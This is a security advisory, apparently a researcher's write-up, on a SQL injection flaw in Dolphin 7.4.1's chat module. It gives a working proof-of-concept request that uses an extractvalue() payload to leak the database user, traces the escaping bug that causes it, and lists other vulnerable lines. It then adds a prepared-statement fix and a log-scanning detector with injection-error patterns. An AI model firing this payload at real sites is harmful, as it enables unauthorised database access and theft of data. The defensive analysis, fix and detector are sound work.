version: Dolphin-v.7.4.1

POC:

```
http://localhost/flash/XML.php?module=chat&app=1&action=RzSetBlocked&id=admin%27&user=%2bextractvalue(1,concat(0x7e,user()))%23&blocked=true
```

After submitting, view the tmp/error.log file:

```
--- 2019-04-15T09:25:16+00:00
Type: PDOException
Message: SQLSTATE[HY000]: General error: 1105 XPATH syntax error: '~root@DESKTOP-9ELD8JS'
File: E:\TODO\Dolphin-v.7.4.1\inc\classes\BxDolDb.php
Line: 169
Trace:
#0 E:\TODO\Dolphin-v.7.4.1\inc\classes\BxDolDb.php(169): PDO->query('REPLACE INTO `s...')
#1 E:\TODO\Dolphin-v.7.4.1\flash\modules\global\inc\db.inc.php(17): BxDolDb->res('REPLACE INTO `s...')
#2 E:\TODO\Dolphin-v.7.4.1\flash\modules\global\inc\db.inc.php(51): BxDbConnect->getResult('REPLACE INTO `s...')
#3 E:\TODO\Dolphin-v.7.4.1\flash\modules\chat\inc\customFunctions.inc.php(70): getResult('REPLACE INTO `s...')
#4 E:\TODO\Dolphin-v.7.4.1\flash\modules\chat\inc\actions.inc.php(123): blockUser('admin\', ', Profile =extr...', true)
#5 E:\TODO\Dolphin-v.7.4.1\flash\XML.php(52): require_once('E:\TODO\Dolphin...')
#6 {main}
```

details:

Step 1: /flash/modules/chat/inc/actions.inc.php Line 120

```php
// Line 10
$sId = isset($_REQUEST['id']) ? process_db_input($_REQUEST['id']) : "";
// ......
// Line 120
case 'RzSetBlocked':
    $sUser = isset($_REQUEST['user']) ? process_db_input($_REQUEST['user']) : "";
    $bBlocked = isset($_REQUEST['blocked']) ? $_REQUEST['blocked'] == TRUE_VAL : false;
    blockUser($sId, $sUser, $bBlocked);
    break;
```

Both `id` and `user` go through process_db_input() before they reach blockUser().

Step 2: Track to process_db_input():

```php
function process_db_input($sText, $iStripTags = 0) {
    // ......
    return $sText;
}
// ......
switch ($iStripTags) {
    case BX_TAGS_STRIP_AND_NL2BR:
        return $oDb->escape(nl2br(strip_tags($sText)), false);
    // ......
    case BX_TAGS_NO_ACTION:
    default:
        return $oDb->escape($sText, false);
}
```

Then track to escape():

```php
public function escape($sText, $bReal = true) {
    $pdoEscapted = $this->link->quote($sText);
    // ......
```

The function quote() backslash-escapes the quote character and wraps the value in single quotes, e.g. `admin'` --> `'admin\''`. The surrounding quotes are then removed with trim(), which strips every quote character at the beginning and end of the string, including the one that belongs to the escaped quote: `'admin\'' --> admin\`. The result ends in a bare backslash.

Step 3: Track to blockUser():

```php
function blockUser($iUserId, $iBlockedId, $bBlock) {
    bx_import('BxDolAlerts');
    if ($bBlock) {
        getResult("REPLACE INTO `sys_block_list` SET `ID` = '" . $iUserId . "', `Profile` = '" . $iBlockedId . "'");
        $oZ = new BxDolAlerts('block', 'add', $iBlockedId, $iUserId);
    } else {
        getResult("DELETE FROM `sys_block_list` WHERE `ID` = '" . $iUserId . "' AND `Profile` = '" . $iBlockedId . "'");
        $oZ = new BxDolAlerts('block', 'delete', $iBlockedId, $iUserId);
    }
    $oZ->alert();
}
```

When $bBlock is true, getResult() is called with the SQL string:

```sql
REPLACE INTO `sys_block_list` SET `ID` = '$iUserId', `Profile` = '$iBlockedId'
```

So... when submitting via browser `id=admin%27&user=%2bextractvalue(1,concat(0x7e,user()))%23&blocked=true`:

- `id=admin%27` --> process_db_input() --> `admin\`
- `user=%2bextractvalue(1,concat(0x7e,user()))%23` --> process_db_input() --> `+extractvalue(1,concat(0x7e,user()))#` (it contains no quote, so it passes through unchanged)

Then the parameters are passed to blockUser(), and the SQL string is:

```sql
REPLACE INTO `sys_block_list` SET `ID` = 'admin\', `Profile` = '+extractvalue(1,concat(0x7e,user()))#'
```

The trailing backslash escapes the quote that should close the `ID` literal, so MySQL reads `', `Profile` = '` as part of that string; everything after it is parsed as SQL, extractvalue() is evaluated, and `#` comments out the final quote.

Q^Q... SQL injection is back.

In this way, as long as two escaped parameters are spliced into one query, SQL injection vulnerabilities may occur.

Other similar scenes:

- /flash/modules/chat/inc/actions.inc.php Line 137
- /flash/modules/chat/inc/actions.inc.php Line 156
- /flash/modules/chat/inc/actions.inc.php Line 180
- /flash/modules/chat/inc/actions.inc.php Line 198
- /flash/modules/chat/inc/actions.inc.php Line 210
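To make Steps 2 and 3 concrete, here is an added example (my own code, not Dolphin's): it models the quote-then-trim escaping traced above, prints the spliced query that blockUser() builds from the report's request values, and then shows a blockUser variant that binds the values with a PDO prepared statement so they can only ever be data. The names modelMysqlQuote, modelEscape, splicedQuery and blockUserSafe are mine; the prepared-statement part runs against an in-memory SQLite database, whose REPLACE syntax differs slightly from MySQL's `REPLACE ... SET`.

```php
<?php
// Added example, not Dolphin code. Models the escape-then-trim step the report
// traces in BxDolDb::escape() and contrasts the spliced query with a prepared
// statement. Table and column names follow the report; function names are mine.

// Model of PDO::quote() on the MySQL driver as the report describes it:
// backslash-escape quotes and wrap the value in single quotes.
function modelMysqlQuote(string $s): string
{
    return "'" . addslashes($s) . "'";
}

// Model of Dolphin's escape($sText, false): quote, then strip the wrapping
// quotes with trim(). trim() removes *every* leading/trailing quote character,
// so an escaped trailing quote loses its quote and leaves a bare backslash.
function modelEscape(string $s): string
{
    return trim(modelMysqlQuote($s), "'");
}

// The spliced query exactly as blockUser() builds it in the report.
function splicedQuery(string $id, string $profile): string
{
    return "REPLACE INTO `sys_block_list` SET `ID` = '" . $id . "', `Profile` = '" . $profile . "'";
}

// Hardened variant: bind both values, so neither can change the statement.
// SQLite has no `REPLACE ... SET`, so the VALUES form is used here.
function blockUserSafe(PDO $pdo, string $id, string $profile, bool $block): void
{
    if ($block) {
        $st = $pdo->prepare("REPLACE INTO sys_block_list (ID, Profile) VALUES (:id, :profile)");
    } else {
        $st = $pdo->prepare("DELETE FROM sys_block_list WHERE ID = :id AND Profile = :profile");
    }
    $st->execute([':id' => $id, ':profile' => $profile]);
}

// Constructed inputs: the decoded `id` and `user` values from the report's request.
$id      = "admin'";
$profile = "+extractvalue(1,concat(0x7e,user()))#";

echo "escape(\"admin'\") => ", modelEscape($id), PHP_EOL;   // admin\
echo "spliced: ", splicedQuery(modelEscape($id), modelEscape($profile)), PHP_EOL;
// The bare backslash escapes the quote that should close the ID literal, so the
// server reads `', `Profile` = '` as string content and the rest as SQL.

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec("CREATE TABLE sys_block_list (ID TEXT, Profile TEXT, PRIMARY KEY (ID, Profile))");

// The raw, un-escaped request values go straight to the prepared statement.
blockUserSafe($pdo, $id, $profile, true);
foreach ($pdo->query("SELECT ID, Profile FROM sys_block_list")->fetchAll(PDO::FETCH_ASSOC) as $row) {
    // Both values land in the table verbatim: the payload is stored, not executed.
    printf("stored row: ID=%s Profile=%s%s", $row['ID'], $row['Profile'], PHP_EOL);
}
blockUserSafe($pdo, $id, $profile, false);
echo "rows after unblock: ", $pdo->query("SELECT COUNT(*) FROM sys_block_list")->fetchColumn(), PHP_EOL;
```

The point of the bound version is that escaping is no longer part of the contract: process_db_input() can keep mangling quotes for other callers, and blockUser() stays correct because the values never become SQL text. The same change applies to the other call sites listed above.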
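From the defender's side, the tmp/error.log entry shown above is the signal to watch: a PDOException whose message is an XPATH syntax error means the database parsed attacker-controlled SQL. The following added script (not from the report or from Dolphin) reads entries in the layout the report shows and flags such errors together with the statement handed to PDO->query(). parseErrorLog and suspiciousEntries are my names, and the log text is constructed for the demo from the report's excerpt plus one unrelated entry.

```php
<?php
// Added example, not Dolphin code: flag error.log entries that indicate injected
// SQL reached the database. Entry layout follows the excerpt in the report.

function parseErrorLog(string $log): array
{
    $entries = [];
    // Each entry starts with "--- <timestamp>" and runs until the next one.
    foreach (preg_split('/^(?=--- )/m', $log, -1, PREG_SPLIT_NO_EMPTY) as $chunk) {
        $e = ['time' => null, 'type' => null, 'message' => null, 'query' => null];
        if (preg_match('/^--- (\S+)/', $chunk, $m))        $e['time']    = $m[1];
        if (preg_match('/^Type: (.+)$/m', $chunk, $m))     $e['type']    = trim($m[1]);
        if (preg_match('/^Message: (.+)$/m', $chunk, $m))  $e['message'] = trim($m[1]);
        // First trace frame that shows the (truncated) statement given to PDO->query().
        if (preg_match('/PDO->query\(\'([^\']*)\'\)/', $chunk, $m)) $e['query'] = $m[1];
        $entries[] = $e;
    }
    return $entries;
}

// Keep PDO errors whose message shows the server parsed attacker-supplied SQL:
// an XPATH syntax error from extractvalue()/updatexml() is the classic tell,
// and a plain SQL syntax error on a query that should never fail is another.
function suspiciousEntries(array $entries): array
{
    return array_values(array_filter($entries, function (array $e): bool {
        return $e['type'] === 'PDOException'
            && $e['message'] !== null
            && preg_match('/XPATH syntax error|You have an error in your SQL syntax/i', $e['message']) === 1;
    }));
}

// Constructed sample: the report's entry followed by an unrelated one.
$sampleLog = <<<'LOG'
--- 2019-04-15T09:25:16+00:00
Type: PDOException
Message: SQLSTATE[HY000]: General error: 1105 XPATH syntax error: '~root@DESKTOP-9ELD8JS'
File: E:\TODO\Dolphin-v.7.4.1\inc\classes\BxDolDb.php
Line: 169
Trace:
#0 E:\TODO\Dolphin-v.7.4.1\inc\classes\BxDolDb.php(169): PDO->query('REPLACE INTO `s...')
#1 E:\TODO\Dolphin-v.7.4.1\flash\modules\global\inc\db.inc.php(17): BxDolDb->res('REPLACE INTO `s...')
--- 2019-04-15T09:26:02+00:00
Type: Exception
Message: constructed unrelated error for the demo
Trace:
#0 {main}
LOG;

foreach (suspiciousEntries(parseErrorLog($sampleLog)) as $e) {
    printf("%s  %s  query=%s%s", $e['time'], $e['message'], $e['query'], PHP_EOL);
}
```

Only the first entry is reported. In a real deployment the query prefix in the trace is truncated by PHP, so correlate the timestamp with the web server's access log to find the offending request.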